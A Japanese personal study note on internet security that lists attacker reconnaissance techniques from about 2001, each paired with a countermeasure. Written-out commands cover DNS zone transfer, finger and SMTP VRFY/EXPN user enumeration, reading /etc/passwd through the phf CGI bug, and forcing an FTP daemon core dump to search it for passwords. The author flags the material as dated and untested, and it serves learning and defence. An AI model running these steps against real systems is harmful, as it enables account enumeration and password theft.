その時々

その時々で違うんです。特に決まっていないんです。

インターネットのセキュリティについて学ぶ3

侵入者による事前調査
(2001年ぐらいの情報なので現在では通用しないかもしれません。)
後、気軽に試すとよろしくないので情報としてだけメモ書きです。

whoisを利用
 whoisサービスにより、ターゲットサイトの各種情報を調査する。JPNICや各国のNIC
 →対策:なし

whoisで取得した割り当てられているIPアドレスより使用しているIPアドレスを特定する
 PINGスイープ。→対策:ルーターでICMPパケットをすべてドロップする

DNSからゾーン転送を利用してDNS内に設定されているすべての情報を引き出す。
 > nslookup - ns.target.com
 > set type=any
  > ls -d target.com.
  > ls -d 1.168.192.in-addr.arpa.
対策:ゾーン転送を制限する

・ネットワークトポロジーを推測する。
 traceroute

・アカウント情報を入手する。メールアカウント名がログインアカウント名となることが多い。
 入手先(名刺、whois、ポームページのリンク 、検索エンジンから@target.comで検索、社員番号や会員番号)
 ユーザーのホームページ(http://www.target.com/~user)
 rusers/ rwho / finger

  >finger @192.168.1.2
  >finger -l @192.168.1.2
  >finger -l guest@192.168.1.2
  >finger -l 0@172.16.200.10

SMTP VRFY/EXPN

  >telnet 192.168.1.2. 25
  >VRFY root
  >VRFY shirai
  >VRFY hogehoge
  >QUIT
  存在する場合は250しない場合は550から始まるメッセージが返答される
  >VERB
  >EXPN root
  >EXPN hogehoge
  >QUIT
  EXPNはさらに詳細な情報が取得できる。

  パスワードファイルの入手
 phf(NCSA httpdに付属するサンプルCGIのバグを利用する)
 /bin/cat /etc/passwdを指定するとパスワードファイルが見える。

 Anonymous FTPでパスワードファイルを取得できることもある。

  coreダンプファイル
 (異常終了時のメモリ内容)
 パスワード認証を行うようなプログラムで異常終了するとメモリ内にパスワードが残る。
 Solarisに付属するFTPデーモン(in.ftpd)は一度もログインしていない状態で~(チルダ)を指定したコマンドを実行するとcoreダンプするバグがある。
 ローカルユーザの場合
 >id
  >ls -l /core
  >telnet localhost 21
  >USER shirai
  >PASS aaaa
  >CWD -
  >ls -l core
  >strings / core | grep srvadmin

リモートから
 >telnet 172.16.200.10 21
  >USER ftp
  >PASS a
  >CWD pub
  >USER root
  >PASS a
  >PASV
  >ftp 172.16.200.10
  >cd pub
  >ls -l
  >bin
  >get core
  >by
  >strings core



 
 

これらすべての対策:不要なサービスは停止

※コマンドについてはそのままメモしただけです。動くかどうかもよく分かりません。

目次:インターネットセキュリティの勉強